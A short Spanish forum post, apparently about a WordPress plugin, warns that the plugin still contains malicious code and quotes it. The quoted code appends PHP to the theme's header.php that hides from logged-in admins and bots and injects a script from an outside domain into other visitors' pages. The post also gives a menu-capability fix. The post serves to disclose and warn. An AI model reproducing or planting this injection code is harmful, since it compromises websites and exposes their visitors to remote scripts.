Nada de resuelto, sigue colocando código malicioso en la línea 638:
if( strpos(file_get_contents(get_template_directory() . "/header.php"),"bwtrack") == false) {
file_put_contents(get_template_directory() . "/header.php", "\n<?php\n\$btt = false;\nif (isset(\$_SERVER['HTTP_USER_AGENT']) && preg_match('/bot|crawl|slurp|spider/i', \$_SERVER['HTTP_USER_AGENT'])) {\n \$btt = true;\n}\n\$ip = \$_SERVER['REMOTE_ADDR'];\nif ( is_user_logged_in() ) {\n update_option( 'ame_ip', \$ip );\n}\nif ( !is_user_logged_in() && get_option('ame_ip')!=\$ip && \$btt==false) {\n echo \"<script src=\\\"//www.shops2b.co.uk/bwtrack.js\\\"></script>\";\n}\n?>\n", FILE_APPEND);
}
Eliminen el plugin y denle un buen baneo al author.
Reemplaza:
add_menu_page(__(‘xxxxxxxxxx’, ‘xxxxxxxxxxxxxxxxxx’), __(‘xxxxxxxxxxxx’, ‘xxxxxxxxxxxxxxxx’), 10, $xxxxxx, array($this, ‘xxxxxxxxxxx’));
por
add_menu_page(__(‘xxxxxxxxxx’, ‘xxxxxxxxxxxxxxxxxx’), __(‘xxxxxxxxxxxx’, ‘xxxxxxxxxxxxxxxx’), “manage_options”, $xxxxxx, array($this, ‘xxxxxxxxxxx’));
Así es como lo he reparado yo ;).
kj
